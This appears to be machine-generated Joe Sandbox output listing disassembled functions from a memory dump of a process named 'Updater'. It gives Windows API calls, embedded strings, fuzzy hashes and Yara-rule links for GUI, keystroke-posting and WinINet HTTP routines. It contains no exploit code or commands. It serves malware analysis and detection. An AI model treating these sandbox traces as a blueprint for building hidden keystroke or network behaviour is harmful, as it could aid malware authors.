Instruction Fuzzy Hash: 1C21F574A00218BBCF10EBA0DC95EFEBBF5EF15710F0042A6B955532A1EB794904DB60

Function 00B83073 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

Part of subcall function 00B84D36: GetClassNameW.USER32(?,?,000000FF), ref: 00B84D59

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00B830F6
GetDlgCtrlID.USER32 ref: 00B83101
GetParent.USER32 ref: 00B8311D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B83120
GetDlgCtrlID.USER32(?), ref: 00B83129
GetParent.USER32(?), ref: 00B8313D
SendMessageW.USER32(00000000,?,00000111,?), ref: 00B83140

Strings

ListBox, xrefs: 00B830B5
ComboBox, xrefs: 00B83080

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 96f6ef280283d8a5f85ff5577bf32e00100745c53eb61d584e1ae4e6f0232df6
Instruction ID: a7de18abd5ad03940fdef694fd953b4dfbdf0637ec9f96c02a9ee470713dc13e
Opcode Fuzzy Hash: 96f6ef280283d8a5f85ff5577bf32e00100745c53eb61d584e1ae4e6f0232df6
Instruction Fuzzy Hash: F721C574A00114BBCF10FBA0DC85AFEBBF9EF15B10F0041A6B955631A1DB794908DB60

Function 00BB43BD Relevance: 15.2, APIs: 10, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00BB443F
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00BB4442
GetWindowLongW.USER32(?,000000F0), ref: 00BB4469
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00BB448C
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00BB4504

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 53184a9b26f5df4a25f55362c185eeabfc50a06d52b45aa1b12ea9096cd68b71
Instruction ID: 798ef90edca9a677d6ade6ec5dfa1ded8bf23d8a5ae0de5bed8292af6a58a2d2
Opcode Fuzzy Hash: 53184a9b26f5df4a25f55362c185eeabfc50a06d52b45aa1b12ea9096cd68b71
Instruction Fuzzy Hash: 50614875900208AFDB20DF68CC81EFE77F8EB09704F1441A9FA15A72A2D7B0A945DB60

Function 00B52B57 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B52B6B

Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A

_free.LIBCMT ref: 00B52B77
_free.LIBCMT ref: 00B52B82
_free.LIBCMT ref: 00B52B8D
_free.LIBCMT ref: 00B52B98
_free.LIBCMT ref: 00B52BA3
_free.LIBCMT ref: 00B52BAE
_free.LIBCMT ref: 00B52BB9
_free.LIBCMT ref: 00B52BC4
_free.LIBCMT ref: 00B52BD2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free$FreeHeap
String ID:
API String ID: 2929853658-0
Opcode ID: e79497d7e2ff3c1e4f6f83fd9a53af54df283e9dc91f770122a3018282a9f19a
Instruction ID: 7517a7c7d21a5b22ded70884aa75158002d843ea1b3d2325699f3dca8ee90316
Opcode Fuzzy Hash: e79497d7e2ff3c1e4f6f83fd9a53af54df283e9dc91f770122a3018282a9f19a
Instruction Fuzzy Hash: 8F11777A505188BFCF05EF58C952ED93BA5EF09351F5141E5BE084B122DA31DE54EB40

Function 00B294B8 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 333comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B29501
OleUninitialize.OLE32(?,00000000), ref: 00B295A0
UnregisterHotKey.USER32(?), ref: 00B29787
DestroyWindow.USER32(?), ref: 00B68D83
FreeLibrary.KERNEL32(?), ref: 00B68DE8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00B68E15

Strings

close all, xrefs: 00B294FC

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: ea76eac24e3eceb289e90a1dcea84913b0909a8eaa22284eb8a8af5be5a2065a
Instruction ID: a964775922d6d04c30d21ffd53dbfb50b782b9a9d965a2b19b4ce95723b2cbc4
Opcode Fuzzy Hash: ea76eac24e3eceb289e90a1dcea84913b0909a8eaa22284eb8a8af5be5a2065a
Instruction Fuzzy Hash: 7CD12571601222CFCB29EF14D499A69F7E1EF18710F1146EDE90EAB261DB35AC12CF90

Function 00B8C563 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,REMOVE), ref: 00B8C5C8

Strings

EXISTS, xrefs: 00B8C6CB
KEYS, xrefs: 00B8C637
APPEND, xrefs: 00B8C76A
REMOVE, xrefs: 00B8C5A9

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: CompareString_wcslen
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1025422365-769500911
Opcode ID: 93c8a3eb9c431f053044237b13099b26ebf80b2d7d5f404369ff4172da75c897
Instruction ID: bd83adf6e3f4043156bc0c8809153d92fd714d19d43801b39a9618a9056b29b4
Opcode Fuzzy Hash: 93c8a3eb9c431f053044237b13099b26ebf80b2d7d5f404369ff4172da75c897
Instruction Fuzzy Hash: 76915CB16083429FCB10EF14D885E6ABBE5FF98714F0049ADF5999B2A1E770DD04CB62

Function 00B357F1 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00B35881

Part of subcall function 00B345EE: GetClientRect.USER32(?,?), ref: 00B34614
Part of subcall function 00B345EE: GetWindowRect.USER32(?,?), ref: 00B34655
Part of subcall function 00B345EE: ScreenToClient.USER32(?,?), ref: 00B3467D

GetDC.USER32 ref: 00B79A62
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B79A75
SelectObject.GDI32(00000000,00000000), ref: 00B79A83
SelectObject.GDI32(00000000,00000000), ref: 00B79A98
ReleaseDC.USER32(?,00000000), ref: 00B79AA0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B79B31

Strings

U, xrefs: 00B79A00

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 9a0a162aa79ecbb91ba7caa19f1218a6d1dae1749d0665cef3a6fc0b80168a91
Instruction ID: f97bf98003c28e742364348646d560866c76ef9feb8e35292bab93ef6ea90a94
Opcode Fuzzy Hash: 9a0a162aa79ecbb91ba7caa19f1218a6d1dae1749d0665cef3a6fc0b80168a91
Instruction Fuzzy Hash: 3271B031900209DFCF258F68D885AFA7BF5FF49320F2482A9ED699B2A5D7319D40DB50

Function 00B94358 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B943A0

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

LoadStringW.USER32(?,?,00000FFF,?), ref: 00B943C6

Strings

^ ERROR, xrefs: 00B94485
Line %d (File "%s"):, xrefs: 00B94427
"%s" (%d) : ==> %s:%s%s, xrefs: 00B944E0
"%s" (%d) : ==> %s:, xrefs: 00B944FE
Error: , xrefs: 00B944AB

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 8a7587a612c3b354b10700c54b29c341fb1fdd32e1dcc923fb159eefac614efb
Instruction ID: 1d0ab5cc76d29722acfddb73a761a2a0f43880837ff5ad730af26ba8e9d9e916
Opcode Fuzzy Hash: 8a7587a612c3b354b10700c54b29c341fb1fdd32e1dcc923fb159eefac614efb
Instruction Fuzzy Hash: B1514F7190011AABCF15EBE0DC82EFEBBB9EF18700F5045B5F509621A1DF305A9ADB51

Function 00BB94ED Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B

Part of subcall function 00B34B74: GetCursorPos.USER32(?), ref: 00B34B88
Part of subcall function 00B34B74: ScreenToClient.USER32(00000000,?), ref: 00B34BA5
Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000002), ref: 00B34BE8

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 00BB9555
ImageList_EndDrag.COMCTL32 ref: 00BB955B
ReleaseCapture.USER32 ref: 00BB9561
SetWindowTextW.USER32(?,00000000), ref: 00BB9609
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BB961C
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00BB96FB

Strings

@GUI_DRAGFILE, xrefs: 00BB9693
@GUI_DROPID, xrefs: 00BB9650

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: b0cafb59d3cca5355ac98460adc8e21bdbb63dfa9040c306a43cd7b33f081386
Instruction ID: a28c19572ed133bb71f6948a0dfd998193e1ca3beac1eeb95a4911e4cf21e85a
Opcode Fuzzy Hash: b0cafb59d3cca5355ac98460adc8e21bdbb63dfa9040c306a43cd7b33f081386
Instruction Fuzzy Hash: 60519931204304AFD704EF24D896FBA77E4FB88714F004AADF65A972A1DBB5A904CB52

Function 00B9CD34 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9CD53
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B9CD7B
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B9CDAB
GetLastError.KERNEL32 ref: 00B9CE03
SetEvent.KERNEL32(?), ref: 00B9CE17
InternetCloseHandle.WININET(00000000), ref: 00B9CE22

Strings

, xrefs: 00B9CD9C

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 4f4c3dad005d65739333a64a514bd063e7d20f82d4ac544e572b83e031348959
Instruction ID: 500943fd77aeae26cd00baeecb938ea37bfd861019b8fc6ecd37febb0cfd4157
Opcode Fuzzy Hash: 4f4c3dad005d65739333a64a514bd063e7d20f82d4ac544e572b83e031348959
Instruction Fuzzy Hash: 4A313AB1600604AFDB219F65DC88AAB7FFCEF49740B1045BAF44697200EB74EE149BA1

Function 00B8A66B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B7690F,?,?,Bad directive syntax error,00BBD938,00000000,00000010,?,?), ref: 00B8A68C
LoadStringW.USER32(00000000,?,00B7690F,?), ref: 00B8A693

Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B8A757

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 00B8A6C1
Error: , xrefs: 00B8A725
Line %d (File "%s"):, xrefs: 00B8A6FD
., xrefs: 00B8A73D
Line %d:, xrefs: 00B8A6E2

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: b950b21bdbd10b8981157c111da4b99627e4dccae81200c27f53e0b5409c5976
Instruction ID: 717b1a124da9712cabc74ec6eb33a322b496e9195f3b811e931a6a17706732a2
Opcode Fuzzy Hash: b950b21bdbd10b8981157c111da4b99627e4dccae81200c27f53e0b5409c5976
Instruction Fuzzy Hash: 3C217E3184021EABCF11EF94DC56EFE77B5BF18700F0448E6F619620B2EA719A58DB51

Function 00B83154 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00B83160
GetClassNameW.USER32(00000000,?,00000100), ref: 00B83175
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B83202

Strings

SHELLDLL_DefView, xrefs: 00B83181
largeicons, xrefs: 00B83196
details, xrefs: 00B831B0
list, xrefs: 00B831E4
smallicons, xrefs: 00B831CA

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 3bc727b69c514576eff7cedf0a754981003234a24d7e16bbb30a87dd3f677cd6
Instruction ID: e68b20829b537fddc2f36a9de82e58678f0a26403ed8e0c7ee01a07019b05b10
Opcode Fuzzy Hash: 3bc727b69c514576eff7cedf0a754981003234a24d7e16bbb30a87dd3f677cd6
Instruction Fuzzy Hash: 7811A77A244307BBE6103A219C0BDA77BDCDB15F64B2001A6F914B50F2FFB66A11A694

Function 00B5CCC0 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00B5CCE7
_free.LIBCMT ref: 00B5CD52
_free.LIBCMT ref: 00B5CD78
_free.LIBCMT ref: 00B5CDA1
_free.LIBCMT ref: 00B5CDD9
_free.LIBCMT ref: 00B5CE0A
_free.LIBCMT ref: 00B5CE4B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 00B5CECC
_free.LIBCMT ref: 00B5CEE5

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: dbd8ab2906233cb80a744b4344b39ae052af7b5eccbac674aa3e95c05104c8a7
Instruction ID: 6ea3d7c1faa44d7d55514d1e07e1bf47e70d8de731f501c786a375dd08b8e908
Opcode Fuzzy Hash: dbd8ab2906233cb80a744b4344b39ae052af7b5eccbac674aa3e95c05104c8a7
Instruction Fuzzy Hash: 2B612771905341AFDB25AF68988277A7FF6DF06352F0405FDEE44EB281EA719C48C690

Function 00B3555B Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B78FD7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B78FF9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B79011
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B7902F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B79050
DestroyIcon.USER32(00000000,?,?,?,?,?,00B2C4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B7905F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B7907C
DestroyIcon.USER32(00000000,?,?,?,?,?,00B2C4A3,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B7908B

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: ef6c16b8dad46ad4aa5540c801f5effcbe9deb20b3fa89195c4fa21531638ccd
Instruction ID: 9df72832ead38cd0570c08f8d09e2ad39a84f2857a654ad1584333c858353ff4
Opcode Fuzzy Hash: ef6c16b8dad46ad4aa5540c801f5effcbe9deb20b3fa89195c4fa21531638ccd
Instruction Fuzzy Hash: 71517A70610605EFDB24DF24CC85BAA3BF6EF58310F214699F91697290EBB1ED80DB50

Function 00B9CC24 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00B9CC63
GetLastError.KERNEL32 ref: 00B9CC76
SetEvent.KERNEL32(?), ref: 00B9CC8A

Part of subcall function 00B9CD34: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B9CD53
Part of subcall function 00B9CD34: GetLastError.KERNEL32 ref: 00B9CE03
Part of subcall function 00B9CD34: SetEvent.KERNEL32(?), ref: 00B9CE17
Part of subcall function 00B9CD34: InternetCloseHandle.WININET(00000000), ref: 00B9CE22

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 8c0e05b555e090c4d779e6554cfbc598943c1ca794eae17ee201b75e636bdd08
Instruction ID: 96abfdc18b18d7b7c7554553a160899317086f66565c143c79a3d8c493bff143
Opcode Fuzzy Hash: 8c0e05b555e090c4d779e6554cfbc598943c1ca794eae17ee201b75e636bdd08
Instruction Fuzzy Hash: 5F315871200609BFDF219F65CC44AAABFF8FF49310B448579F84A83610DB75E810EBA0

Function 00B8367A Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B83E94: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B83EB2
Part of subcall function 00B83E94: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B83EC3
Part of subcall function 00B83E94: GetCurrentThreadId.KERNEL32 ref: 00B83ECA
Part of subcall function 00B83E94: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,?,?,?,00B8368B), ref: 00B83ED1

MapVirtualKeyW.USER32(00000025,00000000), ref: 00B83695
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B836B3
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00B836B7
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B836C1
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B836D9
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00B836DD
MapVirtualKeyW.USER32(00000025,00000000), ref: 00B836E7
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B836FB
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00B836FF

Memory Dump Source

Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_b20000_Updater.jbxd

